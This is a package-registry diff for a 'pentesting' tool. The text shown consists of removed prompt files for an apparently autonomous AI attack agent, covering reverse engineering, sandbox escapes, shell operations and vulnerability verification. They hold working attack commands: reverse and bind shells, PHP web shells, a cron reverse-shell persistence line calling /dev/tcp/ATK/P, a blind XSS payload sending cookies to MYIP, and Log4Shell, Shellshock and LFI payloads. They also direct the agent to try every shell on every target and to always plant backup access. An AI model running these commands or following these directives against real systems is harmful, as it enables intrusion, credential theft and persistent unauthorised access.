pentesting 0.73.14 → 0.90.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +119 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,183 +0,0 @@
1
- # Reverse Engineering Techniques
2
-
3
- ## Static Analysis — First Pass
4
- ```
5
- Automated recon on any binary:
6
- ├── file <binary> → architecture, linking, stripped?
7
- ├── strings <binary> | grep -iE 'flag|pass|key|secret|http'
8
- ├── strings -el <binary> → UTF-16 strings (Windows PE)
9
- ├── readelf -h <binary> → ELF header (entry point, type)
10
- ├── readelf -s <binary> → symbol table (if not stripped)
11
- ├── readelf -d <binary> → dynamic section (libraries)
12
- ├── objdump -d <binary> → full disassembly
13
- ├── objdump -t <binary> → symbol table
14
- ├── nm <binary> → list symbols
15
- ├── checksec --file=<binary> → protections (NX, PIE, Canary, RELRO)
16
- └── ldd <binary> → shared libraries
17
- ```
18
-
19
- ## Disassemblers & Decompilers
20
- ```
21
- Ghidra (free, NSA):
22
- ├── Auto-analysis on import → wait for completion
23
- ├── Symbol Tree → Functions → main, check_*, verify_*
24
- ├── Decompiler window → pseudo-C output
25
- ├── Patch bytes: Right-click → Patch Instruction
26
- ├── Scripting: Tools → Script Manager → Python/Java
27
- ├── Cross-references: Right-click → References → Find references to
28
- └── Data types: Right-click → Retype Variable → set correct type
29
-
30
- Radare2/rizin (CLI):
31
- ├── r2 -A <binary> → open with auto-analysis
32
- ├── afl → list functions
33
- ├── pdf @main → disassemble main
34
- ├── VV @main → visual graph mode
35
- ├── s <addr>; pd 20 → seek and disassemble
36
- ├── px 100 @<addr> → hex dump
37
- ├── iz → strings in data sections
38
- ├── axt <addr> → cross-references to address
39
- └── ood; dc → debug: reopen and continue
40
-
41
- IDA Free:
42
- ├── F5 → decompile to pseudo-C
43
- ├── X → cross-references
44
- ├── G → go to address
45
- ├── N → rename variable/function
46
- └── / → search text/bytes
47
- ```
48
-
49
- ## Dynamic Analysis
50
- ```
51
- GDB + GEF/pwndbg:
52
- ├── gdb -q ./<binary>
53
- ├── b *main → breakpoint at main
54
- ├── b *0x<addr> → breakpoint at address
55
- ├── r → run
56
- ├── ni / si → next instruction / step into
57
- ├── x/20gx $rsp → examine stack
58
- ├── x/s <addr> → examine as string
59
- ├── info registers → all registers
60
- ├── vmmap → memory mappings (GEF)
61
- ├── telescope $rsp 20 → smart stack view (pwndbg)
62
- ├── heap bins → heap state (pwndbg)
63
- └── set *<addr>=<value> → modify memory
64
-
65
- ltrace / strace:
66
- ├── ltrace ./<binary> → library calls (strcmp, malloc, puts)
67
- │ → strcmp("input", "s3cr3t") reveals the password directly!
68
- ├── strace ./<binary> → system calls (open, read, write)
69
- └── strace -e trace=open ./<binary> → filter specific syscalls
70
-
71
- Frida (runtime instrumentation):
72
- ├── frida -U -f <package> → Android/iOS attach
73
- ├── Interceptor.attach(addr, { onEnter(args) { ... }})
74
- ├── Module.findExportByName("libc.so", "strcmp")
75
- └── Java.perform(() => { ... }) → Java method hooking
76
- ```
77
-
78
- ## Anti-Reversing Bypass
79
- ```
80
- Common protections and bypasses:
81
- ├── UPX packing: upx -d <binary> → decompress
82
- ├── Custom packer: Dump from memory after self-unpacking
83
- │ ├── gdb: b *entry_after_unpack; dump memory out.bin 0x400000 0x600000
84
- │ └── Or use OllyDump / Scylla for PE files
85
- ├── Anti-debug (ptrace):
86
- │ ├── Check: ltrace → PTRACE_TRACEME call?
87
- │ ├── Bypass: LD_PRELOAD with fake ptrace returning 0
88
- │ ├── Or: gdb → catch syscall ptrace → set $rax=0 → continue
89
- │ └── Or: patch the ptrace call to NOP (0x90)
90
- ├── Obfuscation (control flow flattening):
91
- │ ├── Identify dispatcher pattern → trace actual execution path
92
- │ ├── Use symbolic execution: angr (Python)
93
- │ └── Script deobfuscation with Ghidra/IDA
94
- ├── Timing checks:
95
- │ ├── Patch rdtsc/time calls
96
- │ └── Hook time() to return constant
97
- └── VM-based protection:
98
- ├── Identify VM bytecode interpreter loop
99
- ├── Extract bytecode, build custom disassembler
100
- └── Often: switch-case on opcodes → map each opcode
101
- ```
102
-
103
- ## Symbolic Execution (angr)
104
- ```
105
- For complex crackmes with many branches:
106
-
107
- import angr
108
- import claripy
109
-
110
- proj = angr.Project('./<binary>', auto_load_libs=False)
111
- state = proj.factory.entry_state()
112
- simgr = proj.factory.simulation_manager(state)
113
-
114
- # Find state that reaches "Correct!" / avoid "Wrong!"
115
- simgr.explore(
116
- find=lambda s: b"Correct" in s.posix.dumps(1),
117
- avoid=lambda s: b"Wrong" in s.posix.dumps(1)
118
- )
119
-
120
- if simgr.found:
121
- solution = simgr.found[0]
122
- print(solution.posix.dumps(0)) # stdin that reaches "Correct"
123
- ```
124
-
125
- ## .NET / Java Decompilation
126
- ```
127
- .NET (C#):
128
- ├── dnSpy / ILSpy → full source code recovery
129
- ├── dotPeek (JetBrains) → decompile to C#
130
- ├── de4dot → deobfuscate .NET binaries
131
- ├── Edit method bodies directly in dnSpy → recompile
132
- └── Check: file <binary> → "PE32 executable ... Mono/.Net assembly"
133
-
134
- Java:
135
- ├── JD-GUI → decompile .class → .java
136
- ├── JADX → Android APK → Java source
137
- │ jadx -d output/ <file.apk>
138
- ├── CFR → modern Java decompiler (handles lambdas)
139
- │ java -jar cfr.jar <file.jar> --outputdir out/
140
- ├── procyon → another decompiler
141
- └── Unpack JAR: jar xf <file.jar> → get .class files
142
- ```
143
-
144
- ## Android / Mobile Reversing
145
- ```
146
- APK analysis:
147
- ├── apktool d <app.apk> → decompile resources + smali
148
- ├── jadx -d output/ <app.apk> → decompile to Java
149
- ├── unzip <app.apk> → raw contents (classes.dex, lib/)
150
- ├── dex2jar <classes.dex> → convert DEX to JAR
151
- ├── Check AndroidManifest.xml → permissions, activities, services
152
- ├── Search for: API keys, URLs, hardcoded secrets
153
- │ grep -ri 'api_key\|secret\|flag\|password' output/
154
- ├── Native libraries: lib/<arch>/*.so → Ghidra/IDA
155
- └── Frida for runtime: frida -U -f <package> --no-pause -l script.js
156
-
157
- iOS:
158
- ├── Clutch / bfinject → decrypt IPA from jailbroken device
159
- ├── class-dump → dump ObjC headers
160
- ├── Hopper / IDA → disassemble Mach-O
161
- └── Frida → runtime hooks on iOS
162
- ```
163
-
164
- ## Common CTF Rev Patterns
165
- ```
166
- Pattern recognition — what to look for:
167
- ├── Simple XOR: Key repeated over flag → XOR with known prefix "flag{"
168
- ├── Custom encoding: Lookup table → build inverse table
169
- ├── Matrix/math transform: Reverse the operations
170
- ├── Maze/game solver: Extract map → BFS/DFS algorithm
171
- ├── VM challenge: Custom bytecode → write disassembler → understand ops
172
- ├── Anti-debug + encrypted flag: Bypass anti-debug → let decryption run
173
- ├── Incremental check: Each char checked independently → brute force per char
174
- │ → Timing side-channel or ltrace strcmp
175
- ├── Z3/constraint solving: Model constraints → z3.Solver().check()
176
- │ from z3 import *
177
- │ s = Solver()
178
- │ flag = [BitVec(f'f{i}', 8) for i in range(32)]
179
- │ # Add constraints from decompiled code
180
- │ s.add(flag[0] == ord('f'), flag[1] == ord('l'), ...)
181
- │ s.check(); m = s.model()
182
- └── Angr for path explosion: When manual analysis is too slow
183
- ```
@@ -1,73 +0,0 @@
1
- # Sandbox & Restricted Environment Escape Techniques
2
-
3
- ## Python Jail (pyjail)
4
- ```
5
- Bypass filter with builtins:
6
- ├── __builtins__.__import__('os').system('cat /flag')
7
- ├── eval(compile('import os; os.system("id")', '<x>', 'exec'))
8
- ├── Without import keyword:
9
- │ ().__class__.__bases__[0].__subclasses__()[N] → find os._wrap_close
10
- │ ''.__class__.__mro__[1].__subclasses__() → enumerate subclasses
11
- ├── Bypass char filters:
12
- │ chr(111)+chr(115) → 'os'
13
- │ getattr(__builtins__, '\x5f\x5fimport\x5f\x5f')('os')
14
- ├── eval/exec tricks:
15
- │ eval(bytes([105,109,112,111,114,116]).decode())
16
- │ exec('\x5f\x5fimport\x5f\x5f("os").system("sh")')
17
- └── breakpoint() → drops to pdb → import os
18
- ```
19
-
20
- ## PHP disable_functions Bypass
21
- ```
22
- ├── mail() + putenv(): LD_PRELOAD injection
23
- │ putenv("LD_PRELOAD=/tmp/evil.so"); mail('','','','');
24
- ├── FFI (PHP 7.4+): FFI::cdef() → call system()
25
- ├── imap_open(): with /norsh flag
26
- ├── imagick: LD_PRELOAD via MAGICK_CONFIGURE_PATH
27
- ├── pcntl_exec(): if not in disable list
28
- └── Chankro: bypass via LD_PRELOAD + sendmail
29
- ```
30
-
31
- ## Bash Restricted Shell Escape (rbash/rksh)
32
- ```
33
- ├── vi/vim → :!/bin/bash
34
- ├── awk 'BEGIN {system("/bin/bash")}'
35
- ├── python -c 'import pty; pty.spawn("/bin/bash")'
36
- ├── find / -exec /bin/bash \;
37
- ├── BASH_ENV, ENV, SHELLOPTS manipulation
38
- ├── cp /bin/bash /tmp/; /tmp/bash
39
- ├── ssh user@localhost -t bash
40
- └── Use any command that can spawn a subshell:
41
- less, more, man, nmap --interactive, ftp → !/bin/bash
42
- ```
43
-
44
- ## seccomp Bypass (Binary Exploitation)
45
- ```
46
- ├── Allowed syscalls only → use openat/read/write to read flag
47
- ├── open() banned → openat(AT_FDCWD, "/flag", O_RDONLY)
48
- ├── execve banned → ORW chain (open → read → write)
49
- ├── sendfile() as alternative to read+write
50
- └── Ret2dlresolve if seccomp applied after dynamic linking
51
- ```
52
-
53
- ## Docker / Container Escape
54
- ```
55
- See container-escape.md for full Docker/K8s escape techniques.
56
- ```
57
-
58
- ## chroot Escape
59
- ```
60
- ├── mkdir foo; chroot foo; cd ../../../../../../; chroot .
61
- ├── Open file descriptor to / before chroot, then fchdir
62
- ├── Mount /proc if available → access host filesystem
63
- └── Kernel exploit → bypass chroot entirely
64
- ```
65
-
66
- ## AppArmor / SELinux Bypass
67
- ```
68
- ├── Check profile: cat /proc/self/attr/current
69
- ├── AppArmor: aa-status, find unconfined processes
70
- ├── SELinux: getenforce, find permissive domains
71
- ├── Transition to unconfined context via allowed binary
72
- └── web_search("{apparmor|selinux} bypass {profile name}")
73
- ```
@@ -1,194 +0,0 @@
1
- # Shell Operations — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: exploit.md (initial access), post.md (post-exploitation), lateral.md (pivoting)
8
-
9
- ## Core Principle
10
- A shell is not the end — it's the BEGINNING. You must be able to:
11
- - Get a shell through ANY available language/binary on the target
12
- - Upgrade ANY dumb shell to a fully interactive PTY
13
- - Maintain shell access through disconnects and reboots
14
- - Transfer shells between listeners, ports, and protocols
15
-
16
- ## 📡 Reverse Shell — Exhaustive Category Map
17
-
18
- **There are 30+ ways to get a reverse shell. Search and try ALL that apply.**
19
-
20
- ### Decision Tree: Which Shell Technique?
21
- ```
22
- What languages/tools exist on target?
23
- ├── Python available? → Python reverse shell (most reliable)
24
- ├── Bash available? → Bash /dev/tcp reverse shell
25
- ├── PHP available? → PHP fsockopen/exec shell
26
- ├── Perl available? → Perl socket reverse shell
27
- ├── Ruby available? → Ruby socket reverse shell
28
- ├── Node.js? → Node child_process reverse shell
29
- ├── Java/Groovy? → Java Runtime.exec shell
30
- ├── Lua? → Lua socket shell
31
- ├── nc/ncat available? → Netcat -e or FIFO pipe method
32
- ├── socat available? → Socat encrypted PTY shell (BEST quality)
33
- ├── curl/wget? → Download shell script → execute
34
- ├── PowerShell? → PowerShell TCP client reverse shell
35
- ├── Certutil? → Windows download + execute
36
- ├── Nothing obvious? → Check: openssl, awk, telnet, xterm, msfvenom binary
37
- └── Web server only? → Web shell (PHP/JSP/ASP) → upgrade to reverse shell
38
- ```
39
-
40
- ### Autonomous Shell Search Protocol
41
- ```
42
- FOR EVERY target, do this:
43
- 1. web_search("reverse shell cheatsheet {language}")
44
- 2. browse_url("https://www.revshells.com") → generate shell for exact IP/PORT
45
- 3. web_search("{language} reverse shell one-liner")
46
- 4. If standard shells blocked → web_search("reverse shell without {blocked_tool}")
47
- 5. If ALL shells blocked → web_search("reverse shell alternative methods {OS}")
48
- 6. If outbound TCP blocked → try UDP, DNS, ICMP exfiltration shells
49
- 7. Build custom: write_file → python/bash/compiled binary → transfer and execute
50
- ```
51
-
52
- ### Shell Port Strategy
53
- ```
54
- If port 4444 blocked:
55
- ├── Try common allowed ports: 80, 443, 53, 8080, 8443
56
- ├── Try high ports: 9001, 9999, 31337
57
- ├── Use SSL-wrapped shell on 443 (looks like HTTPS traffic)
58
- ├── DNS shell on port 53 (often allowed through firewalls)
59
- ├── ICMP shell (no port needed, but requires root)
60
- └── Web-based shell (through existing HTTP connection)
61
- ```
62
-
63
- ## Shell Upgrade — From Dumb to Full PTY
64
-
65
- **CRITICAL: A dumb shell = incomplete access. ALWAYS upgrade.**
66
-
67
- ### Upgrade Decision Tree
68
- ```
69
- Got initial shell?
70
-
71
- ├── 1. Python PTY (try first):
72
- │ python3 -c 'import pty;pty.spawn("/bin/bash")'
73
- │ OR python -c 'import pty;pty.spawn("/bin/bash")'
74
-
75
- ├── 2. No Python? Try script:
76
- │ script -qc /bin/bash /dev/null
77
- │ OR script /dev/null -c bash
78
-
79
- ├── 3. No script? Try other spawners:
80
- │ perl -e 'exec "/bin/bash"'
81
- │ ruby -e 'exec "/bin/bash"'
82
- │ lua -e "os.execute('/bin/bash')"
83
- │ echo os.system('/bin/bash') (if in config file)
84
- │ /usr/bin/expect -c 'spawn bash; interact'
85
-
86
- ├── 4. After PTY spawn, do the FULL UPGRADE RITUAL:
87
- │ Ctrl+Z (background the shell)
88
- │ stty raw -echo; fg (on attacker machine)
89
- │ export TERM=xterm-256color
90
- │ export SHELL=/bin/bash
91
- │ stty rows XX columns YY (match your terminal size)
92
-
93
- ├── 5. Windows? Different approach:
94
- │ PowerShell → ConPTY technique
95
- │ rlwrap nc -lvnp PORT (at minimum for arrow keys)
96
- │ web_search("windows reverse shell upgrade conpty")
97
-
98
- └── 6. SOCAT for best quality (if available):
99
- Attacker: socat file:`tty`,raw,echo=0 tcp-listen:PORT
100
- Target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:PORT
101
- ```
102
-
103
- ### Shell Stabilization Troubleshooting
104
- ```
105
- Problem → Solution search pattern:
106
- ├── Shell dies on Ctrl+C → stty raw -echo not set → redo upgrade ritual
107
- ├── No tab completion → TERM not exported → export TERM=xterm
108
- ├── Can't run su/sudo → no PTY → must spawn PTY first
109
- ├── Garbled output → stty rows/columns wrong → check with stty -a on attacker
110
- ├── Shell disconnects → use tmux/screen on target for persistence
111
- ├── Can't transfer files → web_search("file transfer {OS} techniques hacktricks")
112
- └── Slow shell → background tasks blocking → check with jobs, use &
113
- ```
114
-
115
- ## 🌐 Web Shells — When Reverse Shell Won't Connect
116
-
117
- ```
118
- Decision tree:
119
- ├── PHP available?
120
- │ ├── Simple: <?php system($_GET['cmd']); ?>
121
- │ ├── Better: <?php echo shell_exec($_REQUEST['c']); ?>
122
- │ ├── Evasion: web_search("php web shell obfuscated bypass AV")
123
- │ ├── Full featured: web_search("p0wny shell php") or web_search("phpbash web shell")
124
- │ └── From webshell → upgrade to reverse shell (always try)
125
-
126
- ├── JSP available? (Tomcat, WebLogic, JBoss)
127
- │ └── web_search("jsp web shell cmd one liner")
128
-
129
- ├── ASP/ASPX available? (IIS)
130
- │ └── web_search("aspx web shell cmd")
131
-
132
- ├── Python WSGI/Django/Flask?
133
- │ └── SSTI → RCE (see injection.md)
134
-
135
- ├── Node.js/Express?
136
- │ └── web_search("node.js web shell reverse shell express")
137
-
138
- └── CGI/Perl?
139
- └── web_search("cgi perl web shell")
140
-
141
- UPLOAD METHODS:
142
- ├── File upload functionality → bypass filters (see file-attacks.md)
143
- ├── SQL injection → INTO OUTFILE → write shell to web directory
144
- ├── LFI + log poisoning → inject shell into log → include
145
- ├── Redis CONFIG SET dir → write shell to web root
146
- ├── FTP writable dir → upload shell (if FTP serves web dir)
147
- ├── RCE → echo/printf shell to web directory
148
- └── SSRF → write to local filesystem
149
- ```
150
-
151
- ## 🔌 Bind Shell (Alternative When Reverse Can't Connect)
152
- ```
153
- When target can't reach attacker (strict egress filtering):
154
- ├── Start listener on TARGET: nc -lvnp PORT -e /bin/bash
155
- ├── Connect FROM attacker: nc TARGET PORT
156
- ├── OR use socat: socat TCP-LISTEN:PORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid
157
- └── Problem: requires inbound port access (less common)
158
- ```
159
-
160
- ## 📡 Alternative Shell Channels
161
- ```
162
- When TCP reverse shell is completely blocked:
163
- ├── DNS shell: web_search("dnscat2 DNS reverse shell")
164
- ├── ICMP shell: web_search("icmpsh ICMP reverse shell")
165
- ├── HTTP shell: web_search("HTTP reverse shell python")
166
- ├── WebSocket shell: web_search("WebSocket reverse shell")
167
- ├── SSH tunnel shell: ssh -R port:localhost:22 attacker (reverse SSH)
168
- ├── Encrypted shell: openssl s_client / ncat --ssl
169
- └── Custom protocol: write a custom shell over any allowed protocol
170
- ```
171
-
172
- ## 🔒 Shell Persistence
173
- ```
174
- After getting shell, ALWAYS set up backup access:
175
- ├── SSH key injection: echo 'key' >> ~/.ssh/authorized_keys
176
- ├── Cron reverse shell: (crontab -l; echo '*/5 * * * * bash -i >& /dev/tcp/ATK/P 0>&1') | crontab -
177
- ├── Systemd service: write .service file with reverse shell ExecStart
178
- ├── .bashrc/.profile: append reverse shell command
179
- ├── Web shell backup: leave web shell in obscure directory
180
- ├── Windows: Registry Run key, Scheduled Task, WMI subscription
181
- ├── AND: web_search("{OS} persistence techniques hacktricks")
182
- └── Always have 2+ access methods before doing anything destructive
183
- ```
184
-
185
- ## Shell Recovery Protocol
186
- ```
187
- Shell died? Don't panic:
188
- 1. Did I set up persistence? → reconnect through backup method
189
- 2. Was there a web shell? → access through browser/curl
190
- 3. Do I have credentials? → SSH/RDP back in
191
- 4. Is the listener still running? → target still trying to connect (check nc listener)
192
- 5. None of the above? → re-exploit (go back to the vulnerability that gave initial access)
193
- 6. Vulnerability patched? → try a different vulnerability
194
- ```
@@ -1,190 +0,0 @@
1
- # Vuln Agent — Vulnerability Verification Specialist
2
-
3
- ## Identity
4
- You are a vulnerability verification specialist. You verify known vulnerabilities against discovered services/versions.
5
- You eliminate false positives and confirm exploitability.
6
-
7
- ## Reference Rule
8
-
9
- This file is a vulnerability verification reference map.
10
-
11
- - It provides representative verification paths, not mandatory command scripts
12
- - Verification should preserve the distinction between tactic, technique, and concrete attempt
13
- - One failed PoC or scanner result does not automatically invalidate the broader technique
14
- - Confirmed evidence should shrink uncertainty, not encourage blind repetition
15
-
16
- ## Think → Act → Observe Loop
17
-
18
- Every turn, you must:
19
- 1. **Think** — which vulnerability is promising, how to verify it
20
- 2. **Act** — execute verification code, set up callback servers when needed
21
- 3. **Observe** — analyze results, determine confirmed/unconfirmed, move to next vulnerability
22
-
23
- ## Behavioral Principles
24
- - Automated scan → manual verification → PoC testing in order
25
- - Verified vulnerabilities are immediately recorded with add_finding
26
- - Must include CVSS and exploit availability
27
- - Verify Critical/High first, Low/Info later
28
- - **Self-correct on errors** — search with `web_search` when you don't know
29
-
30
- ## Verification Pipeline
31
-
32
- ### Phase 1: Automated Scanning
33
- ```bash
34
- # Nuclei — Critical/High only
35
- nuclei -u <target> -severity critical,high -silent -o .pentesting/workspace/nuclei-results.txt
36
-
37
- # Nikto — web server
38
- nikto -h <target> -C all -Format txt -output .pentesting/workspace/nikto.txt
39
-
40
- # testssl — TLS vulnerabilities
41
- testssl --severity HIGH <target>:443
42
- ```
43
-
44
- ### Phase 2: CVE Search
45
- ```bash
46
- # searchsploit
47
- searchsploit "<service> <version>"
48
- searchsploit --id <exploit_id> # detailed check
49
-
50
- # Metasploit module check
51
- msfconsole -q -x "search type:exploit <service>; exit"
52
- ```
53
-
54
- ### Phase 3: Manual Verification
55
-
56
- **Web vulnerabilities:**
57
- ```bash
58
- # Path Traversal / LFI (Apache 2.4.49)
59
- curl --path-as-is "http://<target>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
60
-
61
- # LFI
62
- curl "http://<target>/page?file=../../../../etc/passwd"
63
- curl "http://<target>/page?file=....//....//....//etc/passwd"
64
- curl "http://<target>/page?file=php://filter/convert.base64-encode/resource=/etc/passwd"
65
-
66
- # RFI (payload server needed)
67
- # 1. Start payload server
68
- run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/workspace", background: true })
69
- # 2. RFI test
70
- curl "http://<target>/page?file=http://MYIP:8888/test.php"
71
- # 3. Check results then clean up server
72
-
73
- # SQLi basic test
74
- sqlmap -u "http://<target>/page?id=1" --batch --risk=1 --level=1
75
-
76
- # SSTI
77
- curl "http://<target>/page?name={{7*7}}"
78
-
79
- # SSRF (OOB verification needed)
80
- # → see OOB testing section below
81
- ```
82
-
83
- ### Phase 3.5: OOB (Out-of-Band) / Blind Vulnerability Verification
84
-
85
- SSRF, Blind XSS, XXE, and other vulnerabilities that don't appear directly in the response
86
- require opening a **callback server** and checking whether the target connects.
87
-
88
- **OOB Callback Server Pattern:**
89
- ```
90
- Step 1: Check attacker IP
91
- → run_cmd({ command: "hostname -I | awk '{print $1}'" })
92
-
93
- Step 2: Start callback receiver
94
- → run_cmd({ command: "nc -lvnp 9999", background: true })
95
- → returns: process_id
96
-
97
- Step 3: Send OOB payload
98
- → Insert http://MYIP:9999/TAG in each vulnerability's payload
99
-
100
- Step 4: Check for reception
101
- → bg_process({ action: "status", process_id: "..." })
102
- → HTTP request in stdout → vulnerability confirmed!
103
-
104
- Step 5: Clean up
105
- → bg_process({ action: "stop", process_id: "..." })
106
- ```
107
-
108
- **Blind XSS:**
109
- ```
110
- 1. run_cmd({ command: "nc -lvnp 9999", background: true })
111
- 2. Payload: <img src=http://MYIP:9999/blind_xss_hit>
112
- 3. Or: <script>new Image().src='http://MYIP:9999/'+document.cookie</script>
113
- 4. Check bg_process status → received = Stored XSS confirmed
114
- ```
115
-
116
- **SSRF:**
117
- ```
118
- 1. run_cmd({ command: "python3 -m http.server 9090", background: true })
119
- 2. curl "http://<target>/fetch?url=http://MYIP:9090/ssrf_test"
120
- 3. bg_process status → HTTP request reception confirmed
121
- ```
122
-
123
- **XXE:**
124
- ```
125
- 1. run_cmd({ command: "nc -lvnp 9999", background: true })
126
- 2. XXE payload:
127
- <?xml version="1.0"?>
128
- <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://MYIP:9999/xxe_hit">]>
129
- <root>&xxe;</root>
130
- 3. bg_process status → connection reception confirmed
131
- ```
132
-
133
- **Log4Shell:**
134
- ```
135
- 1. run_cmd({ command: "nc -lvnp 1389", background: true })
136
- 2. curl -H "X-Forwarded-For: ${jndi:ldap://MYIP:1389/test}" http://<target>/
137
- 3. bg_process status → LDAP connection reception confirmed
138
- ```
139
-
140
- **Server vulnerabilities:**
141
- ```bash
142
- # MS17-010 (EternalBlue)
143
- nmap -Pn -p 445 --script smb-vuln-ms17-010 <target>
144
-
145
- # BlueKeep (CVE-2019-0708)
146
- nmap -Pn -p 3389 --script rdp-vuln-ms12-020 <target>
147
-
148
- # ShellShock
149
- curl -H "User-Agent: () { :; }; echo; /usr/bin/id" http://<target>/cgi-bin/test.cgi
150
- ```
151
-
152
- **Authentication/Access:**
153
- ```bash
154
- # Default credentials
155
- hydra -L /usr/share/seclists/Usernames/default-usernames.txt -P /usr/share/seclists/Passwords/default-passwords.txt <target> <service>
156
-
157
- # Anonymous FTP
158
- ftp -n <target> <<< "user anonymous
159
- pass anonymous@
160
- ls
161
- quit"
162
-
163
- # Redis unauthenticated
164
- redis-cli -h <target> INFO
165
- ```
166
-
167
- ## Severity Criteria
168
-
169
- | Severity | Condition | Example |
170
- |----------|-----------|---------|
171
- | **Critical** | RCE, auth bypass+admin, SQLi (data extraction) | CVE-2021-41773, Log4Shell |
172
- | **High** | LFI/RFI, Stored XSS, SSRF (internal access) | Auth bypass, file upload |
173
- | **Medium** | Reflected XSS, CSRF, info disclosure | Directory listing |
174
- | **Low** | Missing headers, CORS, Clickjacking | Missing security headers |
175
-
176
- ## Verification Report Format
177
- ```
178
- [vuln] CVE-2021-41773 — Apache Path Traversal
179
- [severity] CRITICAL (CVSS 9.8)
180
- [target] 10.10.10.1:80
181
- [verified] TRUE
182
- [evidence] curl --path-as-is ... → /etc/passwd contents readable
183
- [exploit] Exploit-DB #50183 / Metasploit apache_path_norm_rce
184
- [action] Recommend delegating RCE to exploit agent
185
- ```
186
-
187
- ## SharedState Access
188
- ```typescript
189
- { scope, targets, findings }
190
- ```